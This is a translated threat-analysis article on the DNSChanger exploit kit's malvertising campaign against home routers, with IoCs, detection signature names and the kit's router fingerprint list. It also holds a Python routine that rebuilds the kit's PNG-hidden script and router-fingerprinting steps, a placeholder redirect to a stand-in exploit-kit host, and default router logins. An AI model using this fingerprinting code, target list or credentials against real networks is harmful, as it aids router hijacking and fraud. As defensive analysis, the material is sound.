DNSChanger is back: beware of your home router

Copyright: Creative Commons Attribution-ShareAlike. Others may build on this article, but derivative works must be distributed under the same Creative Commons license as the original.

Summer is here, the discount season is in full swing, and a new strain of malware has gone live at the same time.

You may already have heard the name DNSChanger: by 2012 this malware had infected millions of computers around the world.

Recently, Proofpoint researchers found an upgraded version of the DNSChanger EK (exploit kit) that is delivered through malicious advertising. Once it reaches the user's device, the exploit kit modifies the DNS server entries on the user's router so that they point to a malicious DNS server controlled by the attacker. From then on, when the user tries to open a page, the malicious DNS server can send them to phishing sites; the attacker can also inject ads, redirect search results, and route users to sites hosting drive-by malware.

According to the report published by Proofpoint, the upgraded DNSChanger EK has been active since the end of October, coinciding with a recent series of malvertising campaigns. DNSChanger EK attacks the router through the user's browser: it does not exploit a vulnerability in the browser or the device itself, but vulnerabilities in the home router, and it appears to bundle many known router exploits. DNSChanger EK generally targets the Chrome browser on Windows desktops and Android devices. However, once the router has been compromised, every user connected to it, regardless of operating system or browser, is exposed to further attacks.

The router attacks carried out by DNSChanger EK appear to be related to the recent wave of malvertising. After analysing the attack pattern and the infection chain, the researchers concluded that the same attacker (or group) behind the "CSRF SOHO pharming" campaign of the first half of 2015 is responsible.

Compared with the 2015 activity, however, the researchers identified several new features in the recent wave of attacks:

  1. External domain names that resolve to internal (private) addresses (see the pixN.payswithservers.com entries in the IoC appendix).

  2. Steganography is used to hide:

    1. The AES key that decrypts the fingerprint / default-credential list, which is then decrypted locally in the browser.

    2. The commands sent to the targeted router.

  3. More than a dozen new router exploits: there are now 166 fingerprints, some of which cover several router models, compared with only 55 fingerprints in 2015. For example, the exploit for the "Comtrend ADSL Router CT-5367/5624" was first published only a few weeks earlier (September 13, 2016), and the kit began using it around October 28.

  4. In 36 cases the exploit kit also changes the router's network rules so that the administration port is reachable from external addresses, leaving the router open to further attacks such as infection by the Mirai botnet.

  5. Android devices have also become a vector for these attacks.

Attack chain:

The attacker places malicious ads on legitimate websites in order to trap the user's network.

[Figure: the complete attack process]

[Figure: traffic captured by the researchers]
Attack Analysis:

When a user on a PC or a mobile phone clicks a malicious ad, traffic is sent to the DNSChanger EK.

DNSChanger EK sends a WebRTC request to Mozilla's STUN server (stun.services.mozilla[.]com) to obtain the user's local IP address. If the user's public IP address is already known, or the local IP address is not in the target range, the user is shown a legitimate ad from a third-party advertiser. Otherwise the user is shown the malicious ad. JavaScript/HTML code is extracted from the comment field of a PNG file and the user is redirected to the page hosting the DNSChanger EK. Note that the fake ad marked (1) in the figure is actually a PNG file, not a .jpg.
DNSChanger EK checks the user's local IP address a second time via STUN. It then loads several functions and retrieves a small AES key that has been hidden steganographically inside an image.
This key is used to decrypt the fingerprint list; after duplicates are removed, the list contains 129 entries (the full list is in the appendix).
The user's browser then tries to locate and identify the router on the local network (top image). After the search routine has run, the browser reports its findings to the DNSChanger EK, which returns the commands the browser uses to attack the router.
In detail, the router model identified by the browser's search determines the attack: if no exploit is available, the kit tries default login credentials (such as admin:admin, admin:1234, admin:password, admin:12345 and so on); if an exploit is available, it modifies the DNS entries in the router and, where possible (36 of the 129 fingerprints allow it), opens the administration port to external addresses, which can expose the router to further attacks such as infection by Mirai.
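The two browser-side tricks described above, hiding the script in a PNG comment field and recognizing the router by the images of its web UI, are easy to reproduce on the analyst's side. The block below is an added example, not code from the article or from Proofpoint's report: it walks the chunks of a PNG (verifying each CRC) to pull out any tEXt comment, reads image dimensions from PNG and GIF headers, parses fingerprint lines in the appendix format `[id, path, width, height, flag, flag]`, and matches images fetched from a gateway against them. The ad image, the fake gateway images and the placeholder "payload" are all constructed for the example; the three fingerprint lines are copied from the appendix, and the `ek.example.invalid` URL is hypothetical.

```python
# Added example, not code from the article or from Proofpoint. (a) Recover text hidden
# in a PNG's comment field, where the kit stored its JavaScript; (b) identify a gateway
# by the dimensions of its web-UI images, which is what the appendix entries
# [id, path, width, height, ...] encode. All images below are constructed samples.
import json
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_chunks(data):
    """Yield (type, payload) for each chunk, checking the signature and every CRC."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + payload) != crc:
            raise ValueError("bad CRC in %r chunk" % ctype)
        yield ctype, payload
        pos += 12 + length
        if ctype == b"IEND":
            break


def png_text(data):
    """Return {keyword: text} from every tEXt chunk (keyword, NUL, Latin-1 text)."""
    found = {}
    for ctype, payload in png_chunks(data):
        if ctype == b"tEXt":
            key, _, text = payload.partition(b"\x00")
            found[key.decode("latin-1")] = text.decode("latin-1")
    return found


def image_size(data):
    """(width, height) of a PNG (from IHDR) or a GIF (from the logical screen header)."""
    if data.startswith(PNG_SIG):
        for ctype, payload in png_chunks(data):
            if ctype == b"IHDR":
                return struct.unpack(">II", payload[:8])
        raise ValueError("PNG without IHDR")
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return struct.unpack("<HH", data[6:10])
    raise ValueError("unsupported image format")


def parse_fingerprints(text):
    """Parse appendix lines such as [-37,"/img/Netgeargenie.png",290,41,"0",0]."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):
            fid, path, width, height = json.loads(line)[:4]
            entries.append((fid, path.strip(), int(width), int(height)))
    return entries


def match_fingerprints(observed, fingerprints):
    """observed maps a web-UI path to the bytes fetched from the gateway at that path."""
    hits = []
    for fid, path, width, height in fingerprints:
        try:
            if path in observed and image_size(observed[path]) == (width, height):
                hits.append(fid)
        except ValueError:  # not PNG/GIF, or truncated: no match
            pass
    return hits


def make_png(width, height, comment=None):
    """Minimal valid 8-bit grayscale PNG (constructed sample, not a real ad image)."""
    def chunk(ctype, payload):
        return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", zlib.crc32(ctype + payload))
    png = PNG_SIG + chunk(b"IHDR", struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0))
    if comment is not None:
        png += chunk(b"tEXt", b"Comment\x00" + comment.encode("latin-1"))
    rows = b"\x00" * ((width + 1) * height)  # one filter byte plus `width` pixels per row
    return png + chunk(b"IDAT", zlib.compress(rows)) + chunk(b"IEND", b"")


# Three lines copied from the appendix; two share a path and size and differ only in flags.
SAMPLE_FINGERPRINTS = """
[-37,"/img/Netgeargenie.png",290,41,"0",0]
[-32,"/redbull.gif",7,7,"1",0]
[-18,"/redbull.gif",7,7,"0",0]
"""


def demo():
    """Hide a placeholder script in an ad PNG, recover it, then fingerprint a fake gateway."""
    placeholder = "<script>location='http://ek.example.invalid/'</script>"  # hypothetical, not the real payload
    ad = make_png(300, 250, comment=placeholder)
    gateway = {"/img/Netgeargenie.png": make_png(290, 41), "/redbull.gif": b"GIF89a\x07\x00\x07\x00"}
    return png_text(ad)["Comment"], match_fingerprints(gateway, parse_fingerprints(SAMPLE_FINGERPRINTS))
```

Running `demo()` returns the recovered placeholder script together with the ids `[-37, -32, -18]`. The duplicate `/redbull.gif` hit shows why the list carries the extra flags: several firmware families ship the same tiny image, so the kit needs more than one image, or the flags, to pick the right exploit. To check a real gateway, fetch the appendix paths from its address with an HTTP client and pass the response bodies in as `observed`.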
After infection:

The researchers note that the purpose behind this kind of router DNS modification is usually unclear, but in this case they identified at least one motive. By comparing the answers of a trusted public DNS server with those of the rogue DNS servers, they found that the attacker's main goal is to steal traffic belonging to some large advertising sites.
The attacker forces the domains in question to resolve to 193.238.153[.]10 or 46.166.160[.]187. Depending on the domain, the attacker can alter the advertising behaviour, modify the target site (for example, a click anywhere on the page may open a pop-up), or replace the original ads.
The researchers found that the attacker directs the traffic to Fogzy (a.rfgsi[.]com) and TrafficBroker, and have contacted both agencies to obtain more information and to inform them that this traffic was stolen.

Scope of impact

Because the researchers could not obtain the link between the fingerprint data seen on the victim side and the corresponding router, they cannot provide a complete list of routers affected by this threat. However, since the kit integrates all known exploits, they recommend that every user update their router firmware to the latest known version.

The researchers confirmed that at least the following routers are affected:

D-Link DSL-2740R

COMTREND ADSL Router  CT-5367 C01_R12

NetGear WNDR3400v3 (and likely other models in this series)

Pirelli ADSL2/2+ Wireless Router P.DGA4001N

Netgear R6200

In addition, a 0-day exploit has been published for Netgear's R7000, R6400 and other models. Proofpoint specifically checked the DNSChanger fingerprints for these models, and as of December 12, 2016 had found none. The researchers nevertheless recommend following the advice issued by US-CERT and disabling the web server on the affected Netgear routers, since they expect the 0-day exploit to be added to DNSChanger EK in the near future. Netgear has also released several beta firmware versions for the disclosed vulnerabilities, which users should install promptly.

In many cases, simply disabling a home router's remote management feature improves its security. In this case, however, the attacker operates from a device that is already connected to the router by wire or wireless. Remote management therefore does not need to be enabled for the attacker to modify the router's settings.

Mitigation measures

Unfortunately, there is no simple way to block this kind of attack. The best available mitigation is to update the router to the latest firmware version. Changing the router's default local IP address range may also offer some protection, because the kit only fires when the local address is in its target range. Finally, browser ad-blocking extensions may help, since these attacks start with malicious ads.

Epilogue

When an attacker controls the DNS server of a network, every device on that network is exposed to a range of attacks, including bank fraud, man-in-the-middle attacks, phishing and advertising fraud. In this case, DNSChanger EK lets the attacker take over the only DNS server in the home network: the router itself. In the end, avoiding such attacks requires router vendors to keep patching their firmware and users to apply those updates regularly.

Appendix

IoC:

  Domain | IP | Comment
  modificationserver.com | 93.115.28.248 | Malvertising, step 2 in front of the EK (2016-12)
  expensiveserver.com | 46.28.67.21 | Malvertising, step 1 in front of the EK (2016-12)
  immediatelyserver.com | | Malvertising, in front of the EK (2016-11)
  respectsserver.com | 217.12.220.127 | Malvertising, step 1 in front of the EK (2016-10)
  ad.reverencegserver.com | | Malvertising, step 2 in front of the EK (2016-10)
  parametersserver.com | 93.115.28.249 | DNSChanger EK / RouterEK (2016-12)
  phosphateserver.com | | DNSChanger EK / RouterEK (2016-11)
  cigaretteinserver.com | | DNSChanger EK / RouterEK (2016-10)
  | 46.17.102.10 to 46.17.102.24 | Rogue DNS servers
  | 5.39.220.117 to 5.39.220.126 | Rogue DNS servers
  | 217.12.218.114 to 217.12.218.121 | Rogue DNS servers
  | 93.115.31.194 to 93.115.31.244 | Rogue DNS servers
  | 193.238.153.10 and 46.166.160.187 | Substituted IPs for targeted traffic (impersonating server); traffic to these hosts is most probably a symptom of DNS entries modified on the router
  pix1.payswithservers.com | | External domain resolving to 192.168.1.1
  pix2.payswithservers.com | | External domain resolving to 192.168.8.1
  pix3.payswithservers.com | | External domain resolving to 192.168.178.1
  pix4.payswithservers.com | | External domain resolving to 192.168.0.1
  pix5.payswithservers.com | | External domain resolving to 192.168.10.1
  pix6.payswithservers.com | | External domain resolving to 192.168.137.1
  pix7.payswithservers.com | | External domain resolving to 10.10.10.1
  pix8.payswithservers.com | | External domain resolving to 192.168.100.1
  pix9.payswithservers.com | | External domain resolving to 10.1.1.1
  pix10.payswithservers.com | | External domain resolving to 10.0.0.1
  pix11.payswithservers.com | | External domain resolving to 192.168.2.1
  pix12.payswithservers.com | | External domain resolving to 192.168.254.1
  pix13.payswithservers.com | | External domain resolving to 192.168.11.1
  pix14.payswithservers.com | | External domain resolving to 192.168.3.1
  sub[i].domain254.com for 0 < i < 18 | | Not resolving
  sub16.domain.com | 66.96.162.92 | Resolving to 66.96.162.92
  sub17.domain.com | 66.96.162.92 | Resolving to 66.96.162.92
Selected ET (Emerging Threats) signatures:

2023473 || ET CURRENT_EVENTS DNSChanger EK Secondary Landing Oct 31 2016

2021090 || ET CURRENT_EVENTS DNSChanger EK Landing May 12 2015

2023466 || ET EXPLOIT D-Link DSL-2740R Remote DNS Change Attempt

2020487 || ET EXPLOIT Generic ADSL Router DNS Change GET Request

2020488 || ET EXPLOIT Generic ADSL Router DNS Change POST Request

2020854 || ET CURRENT_EVENTS DRIVEBY Router DNS Changer Apr 07 2015

2020856 || ET EXPLOIT TP-LINK TL-WR340G Router DNS Change GET Request

2020857 || ET EXPLOIT Belkin Wireless G Router DNS Change POST Request

2020858 || ET EXPLOIT Linksys WRT54GL Router DNS Change POST Request

2020859 || ET EXPLOIT Netgear WNDR Router DNS Change POST Request

2020861 || ET EXPLOIT Motorola SBG900 Router DNS Change GET Request

2020862 || ET EXPLOIT ASUS RT N56U Router DNS Change GET Request 1

2020863 || ET EXPLOIT ASUS RT N56U Router DNS Change GET Request 2

2020871 || ET EXPLOIT ASUS RT N56U Router DNS Change GET Request 3

2020873 || ET EXPLOIT D-link DI604 Known Malicious Router DNS Change GET Request

2020874 || ET EXPLOIT Netgear DGN1000B Router DNS Change GET Request

2020875 || ET EXPLOIT Belkin G F5D7230-4 Router DNS Change GET Request

2020876 || ET EXPLOIT Tenda ADSL2/2+ Router DNS Change GET Request

2020877 || ET EXPLOIT Known Malicious Router DNS Change GET Request

2020878 || ET EXPLOIT TP-LINK TL-WR841N Router DNS Change GET Request

2020896 || ET CURRENT_EVENTS DRIVEBY Router DNS Changer Apr 07 2015 M2

2023467 || ET EXPLOIT COMTREND ADSL Router CT-5367 Remote DNS Change Attempt

2023468 || ET EXPLOIT Unknown Router Remote DNS Change Attempt

2023628 || ET EXPLOIT Netgear R7000 Command Injection Exploit

2823788 || ETPRO TROJAN DNSChanger Rogue DNS Server (A Lookup)

2823811 || ETPRO CURRENT_EVENTS DNSChanger EK DNS Reply Adfraud Server 1 Dec 12 2016

2823812 || ETPRO CURRENT_EVENTS DNSChanger EK DNS Reply Adfraud Server 2 Dec 12 2016
Fingerprint list (each entry has the form [index, image path on the router's web UI, expected width, expected height, flag, flag]; the browser recognizes the router model by loading the image and comparing its pixel dimensions; the meaning of the last two flags is not given in the report):

[-37,"/img/Netgeargenie.png",290,41,"0",0]

[-36,"/UILinksys.gif",165,57,"0",0]

[-32,"/redbull.gif",7,7,"1",0]

[-31,"/settings.gif",654,111,"0",0]

[-30,"/images/img_masthead.jpg",836,92,"0",0]

[-29,"/images/logo.png",183,46,"0",0]

[-28,"/images/top1_1.jpg",280,87,"1",0]

[-27,"/headlogoa.gif",370,78,"0",0]

[-26,"/image/logo_gn.gif",101,51,"0",0]

[-25,"/bg_logo.jpg",858,82,"0",0]

[-24,"/image/tops.gif",450,92,"0",0]

[-23,"/graphics/banner.png",1024,70,"1",0]

[-22,"/img/loading.gif",32,32,"0",0]

[-21,"/logo_corp.gif",95,50,"1",0]

[-20,"/img/banner.gif",778,60,"0",0]

[-19,"/down_02.jpg",133,75,"0",0]

[-18,"/redbull.gif",7,7,"0",0]

[-17,"/pic/head_01.gif",162,92,"0",0]

[-16,"/image/linksys_logo.png",230,30,"0",0]

[-15,"/file/Comtrend_banner.jpg",897,70,"1",0]

[-13,"/logo.gif",371,38,"1",0]

[-12,"/image/top/NETGEAR_Genie.png",512,60,"1",0]

[-11,"/img/Netgeargenie.png",290,41,"",0]

[-10,"/tmp.gif",700,54,"1",0]

[-9,"/wlan_masthead.gif",836,92,"0",0]

[-8,"/images/logo.png",146,38,"0",0]

[-6,"/image/top/logo.gif",300,38,"0",0]

[-4,"/button_log_in.gif",70,21,"0",0]

[-3,"/image/UI_Linksys.gif",166,58,"1",0]

[-2,"/smclg.gif",133,59,"0",0]

[-1,"/themes/TM04/Drift-logo.png",300,89,"0",0]

[0,"/graphics/topbar.jpg",900,69,"1",1]

[1,"/graphics/young.png",128,96,"1",0]

[2,"/images/bg_stripes.png",50,50,"1",0]

[3,"/image/logo.png",271,43,"0",0]

[5,"/images/logo.gif",133,59,"0",0]

[8,"/img/tenda-logo-big.png",199,45,"0",0]

[9,"/images/main_welcome.gif",850,179,"1",1]

[11,"/image/UI_Linksys.gif",288,58,"0",0]

[12,"/Images/img_masthead_red.gif",856,92,"0",0]

[13,"/settings.gif",750,85,"0",0]

[14,"/images/top-02.gif",359,78,"1",0]

[15,"/UI_Linksys.gif",165,57,"1",0]

[16,"/set_bt.gif",93,52,"0",1]

[18,"/images/top1_1.jpg",208,85,"1",0]

[19,"/graphics/head_logo.gif",121,64,"0",0]

[20,"/images/top1_1.jpg",280,87,"0",0]

[21,"/router_logo.jpg",79,50,"1",0]

[22,"/graphics/gui_admin_login.jpg",283,120,"0",0]

[23,"/ag_logo.jpg",164,91,"1",0]

[24,"/images/head_logo.gif",312,68,"0",0]

[25,"/menu-images/logo.gif",169,50,"1",0]

[28,"/image/UI_Linksys.gif",288,58,"1",0]

[29,"/Images/Logo.gif",143,33,"0",0]

[30,"/images/logo.gif",169,50,"0",0]

[31,"/pic/logo.png",287,69,"0",0]

[32,"/spin.gif",16,16,"1",0]

[33,"/icons/top_left.png",300,96,"1",0]

[34,"/headlogo.gif",121,64,"0",0]

[35,"/pictures/home.jpg",255,41,"1",0]

[37,"/images/new_qanner.gif",840,92,"0",0]

[38,"/zyxellg.gif",169,50,"0",0]

[39,"/imagesV/vlogo_blk.jpg",185,40,"0",0]

[40,"/images/New_ui/asustitle.png",218,54,"0",0]

[41,"/images/New_ui/asustitle_changed.png",218,54,"0",0]

[45,"/images/date_bg.png",71,70,"0",0]

[47,"/graphic/head_04.gif",836,92,"0",0]

[49,"/image/logo.gif",390,69,"0",0]

[50,"/images/data_1_voda.gif",149,28,"0",0]

[51,"/images/logo_wind.gif",156,28,"0",0]

[53,"/pic/ag_logo.jpg",164,91,"0",0]

[54,"/banner_s.gif",126,65,"1",0]

[55,"/logo.gif",270,69,"0",0]

[56,"/logo_320x23.png",320,23,"0",0]

[58,"/image/UI_Linksys.gif",165,57,"1",0]

[59,"/file/int_logo_4_firmware.gif",366,66,"1",0]

[61,"/images/header.jpg",800,70,"0",0]

[62,"/images/btn_apply.png",61,20,"0",0]

[63,"/tendalogo.gif",387,90,"0",0]

[64,"/file/Logo.gif",216,83,"1",0]

[65,"/body/logo.jpg",154,118,"0",0]

[68,"/head_logo_p1_encore.jpg",92,72,"0",0]

[69,"/images/UI_Linksys.gif",288,57,"0",0]

[70,"/images/title_2.gif",321,28,"1",0]

[71,"/home_01.gif",765,95,"0",0]

[74,"/wlan_masthead.gif",836,85,"0",0]

[75,"/settingsDGND3300.jpg",799,97,"0",0]

[76,"/main/banner_files/bannertxt.gif",672,40,"0",0]

[77,"/html/images/dsl604.jpg",765,95,"1",0]

[79,"/head_logo.gif",140,64,"0",0]

[80,"/images/logo.jpg",270,69,"0",0]

[81,"/images/logo_netis.png",121,31,"0",0]

[82,"/images/icon-Change_pencil.png",18,18,"0",0]

[83,"/logo1.gif",207,105,"0",0]

[85,"/images/icon_now.gif",14,14,"0",0]

[87,"/down_02.jpg",135,75,"0",0]

[88,"/Images/logo.gif",270,69,"1",0]

[89,"/UILinksys.gif",166,58,"1",0]

[91,"/image/UI_Linksys.gif",134,58,"1",0]

[92,"/logo.gif",390,69,"0",0]

[93,"/images/icon_now.gif",14,14,"1",0]

[95,"/Images/img_masthead_red.gif",836,92,"0",0]

[97,"/images/topbg.gif",960,66,"0",0]

[99,"/down_02.jpg",133,75,"1",0]

[102,"/images2/main_title.n704bcm.gif",758,74,"0",0]

[104,"/common/images/logo.gif",108,32,"0",0]

[105,"/Images/logo.gif",780,62,"0",0]

[106,"/images2/login_title.n704bcm.gif",299,62,"0",0]

[107,"/images2/login_title.n704a3.gif",299,62,"0",0]

[108,"/file/logo.gif",165,47,"1",0]

[110,"/images/login_title_n104t.gif",299,62,"0",0]

[111,"/img/redbull.gif ",7,7,"1",0]

[112,"/images/head_logo.gif",140,78,"0",0]

[114,"/img/title_RP614v4.gif",750,85,"0",0]

[115,"/UI_Linksys.gif ",273,44,"1",0]

[116,"/logo.gif",318,69,"0",1]

[117,"/pic/img_masthead.gif",836,92,"0",0]

[118,"/images/logo.gif",76,69,"0",0]

[119,"/images/logo_transparent.gif",156,129,"0",0]

[121,"/Images/bg_a1.gif",280,70,"0",0]

[122,"/images/index_wrapper_bg_3347.png",801,325,"0",0]

[123,"/images/vz_logo.gif",185,40,"0",0]

[124,"/file/Manhattan_Banner.png ",452,90,"1",0]

[125,"/Images/Logo.gif",150,47,"0",0]

[126,"/Images/Logo.gif",200,50,"0",0]

[127,"/images/corp_logo.gif",153,42,"0",0]

[128,"/images/logo.png",171,75,"0",0]

[129,"/cornerartD241.jpg",140,90,"0",0]


Source: https://blog.csdn.net/kclax/article/details/93635117